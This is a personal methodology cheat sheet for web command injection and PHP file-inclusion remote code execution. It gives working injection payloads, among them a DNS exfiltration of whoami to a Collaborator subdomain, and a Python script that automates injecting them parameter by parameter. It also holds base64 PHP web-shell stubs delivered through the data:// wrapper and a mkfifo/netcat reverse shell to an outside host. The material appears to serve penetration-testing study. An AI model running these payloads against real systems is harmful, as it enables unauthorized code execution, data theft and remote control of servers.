🏎️My RCE / File Upload / Command injection Methodology

OS command injection, simple case

Use Burp Suite to intercept and modify a request that calls the target function.

Modify each parameter in the request body one at a time, giving it the value 1|whoami. Tampering with one parameter per request is what tells you which one is injectable.

Observe that the response contains the name of the current user.

-------------------------------------------------------------

Blind OS Command injection with time delays

Use Burp Suite to intercept and modify a request that calls the target function.

Modify each parameter one at a time (for example the email parameter), changing it to: email=x||ping+-c+10+127.0.0.1||

Observe that the response takes about 10 seconds to return, compared with the untampered request. Time the untampered request first so normal latency is not mistaken for a delay.

-------------------------------------------------------------

Blind OS command injection with output redirection

Use Burp Suite to intercept and modify a request that calls the target function.

Modify each parameter one at a time (for example the email parameter), changing it to: email=||whoami>/var/www/images/output.txt||

The target directory must be writable by the web server process and served back by the application (here, the product-image directory).

Now use Burp Suite to intercept and modify the request that loads an image of a product.

Modify the filename parameter, changing the value to the name of the file you specified for the output of the injected command:

filename=output.txt

Observe that the response contains the output from the injected command.

-------------------------------------------------------------

Blind OS command injection with out-of-band interaction

Use Burp Suite to intercept and modify a request that calls the target function.

Modify each parameter one at a time (for example the email parameter), changing it to: email=x||nslookup+x.BURP-COLLABORATOR-SUBDOMAIN||

Right-click and select "Insert Collaborator payload" to insert a Burp Collaborator subdomain where indicated in the modified email parameter.

-------------------------------------------------------------

Blind OS command injection with out-of-band data exfiltration

Use Burp Suite to intercept and modify a request that calls the target function.

Click "Copy to clipboard" in the Collaborator tab to copy a unique Burp Collaborator payload to your clipboard.

Modify each parameter one at a time (for example the email parameter), changing it to: email=||nslookup+`whoami`.BURP-COLLABORATOR-SUBDOMAIN||

The backticks make the shell run whoami first and splice its output in as the leftmost DNS label, so the username arrives in the Collaborator DNS query.

Go back to the Collaborator tab, and click "Poll now". You should see some DNS interactions that were initiated by the application as a result of your payload.
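The five command-injection checks above share one loop: substitute a payload into one parameter at a time, encode it so the shell metacharacters survive the form encoding, send, and watch the oracle (response content, timing, a written file, or a Collaborator hit). The following is an added example, not part of the original notes, that implements that loop in Python with the timing oracle fully worked; the sender is pluggable so it can be pointed through Burp. The target URL, parameter names and Collaborator domain are placeholders.

```python
import time
import urllib.parse
import urllib.request
from typing import Callable, Dict, Iterator, List, Tuple

Sender = Callable[[str, str], str]  # (url, form-encoded body) -> response text


def time_payload(delay: float = 10) -> str:
    # ping -c N 127.0.0.1 takes roughly N seconds; "||" runs it even if the
    # left-hand value makes the original command fail.
    return f"x||ping -c {delay} 127.0.0.1||"


def payloads_for(collab: str, delay: float = 10) -> Dict[str, str]:
    """Payloads from the notes above. collab is your own Collaborator/OOB domain."""
    return {
        "direct":    "1|whoami",
        "time":      time_payload(delay),
        "redirect":  "||whoami>/var/www/images/output.txt||",
        "oob":       f"x||nslookup x.{collab}||",
        "oob-exfil": f"||nslookup `whoami`.{collab}||",
    }


def mutate_one_at_a_time(params: Dict[str, str], payload: str) -> Iterator[Tuple[str, Dict[str, str]]]:
    """Yield (parameter name, copy of params with only that parameter replaced).
    One tampered parameter per request is what identifies the injectable one."""
    for name in params:
        mutated = dict(params)
        mutated[name] = payload
        yield name, mutated


def encode_body(params: Dict[str, str]) -> str:
    """application/x-www-form-urlencoded body. urlencode percent-encodes |, > and `
    and turns spaces into +, which is exactly the ping+-c+10 form in the notes."""
    return urllib.parse.urlencode(params)


def http_post(url: str, body: str) -> str:
    """Default sender (constructed for this example): a plain urllib POST. Route it
    through Burp's proxy if you want the traffic in Burp's history."""
    req = urllib.request.Request(url, data=body.encode(), method="POST",
                                 headers={"Content-Type": "application/x-www-form-urlencoded"})
    with urllib.request.urlopen(req, timeout=60) as resp:
        return resp.read().decode(errors="replace")


def _timed(sender: Sender, url: str, body: str) -> float:
    t0 = time.monotonic()
    sender(url, body)
    return time.monotonic() - t0


def probe_time_delay(url: str, params: Dict[str, str], sender: Sender = http_post,
                     delay: float = 10, slack: float = 0.8) -> List[str]:
    """Blind detection by timing. A parameter is flagged when the tampered request
    takes at least slack*delay longer than an untampered baseline request; the
    baseline absorbs normal latency so a slow server is not a false positive."""
    baseline = _timed(sender, url, encode_body(params))
    hits = []
    for name, mutated in mutate_one_at_a_time(params, time_payload(delay)):
        if _timed(sender, url, encode_body(mutated)) - baseline >= slack * delay:
            hits.append(name)
    return hits


if __name__ == "__main__":
    # Placeholder endpoint and parameters; replace with the real request.
    print(probe_time_delay("http://target.example/product/stock",
                           {"productId": "1", "storeId": "1"}))
```

Run the direct, redirect and OOB payloads through the same mutate_one_at_a_time / encode_body pair; only the oracle changes (grep the response for a username, fetch the written file, or poll Collaborator).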

-------------------------------------------------------------

RCE (reverse shell) using the PHP data:// wrapper in an LFI parameter (file=)

This works only when attacker input reaches include() and allow_url_include=On, since that setting gates the data:// wrapper. The PHP stub is base64-encoded so no quotes or spaces appear in the URL; the command goes in a separate cmd parameter joined with & (it is not appended directly to the base64 text).

Stub with a success marker:

<?php system($_GET['cmd']);echo 'Shell Executed Successfully!!!'; ?>

file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgRXhlY3V0ZWQgU3VjY2Vzc2Z1bGx5ISEhJzsgPz4=

Minimal stub:

<?php system($_GET['cmd']);?>

file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=&cmd=ls

Reverse shell (URL-encode the command before sending; otherwise |, ;, > and & are consumed by the query-string parser):

file=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=&cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.102.129 5555 >/tmp/f

-------------------------------------------------------------
